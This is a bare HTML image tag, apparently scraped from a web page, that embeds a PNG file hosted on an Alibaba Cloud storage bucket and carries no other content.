<img src="https://hnxx.oss-cn-shanghai.aliyuncs.com/official/1704435025746.png?t=0.910351182018946" />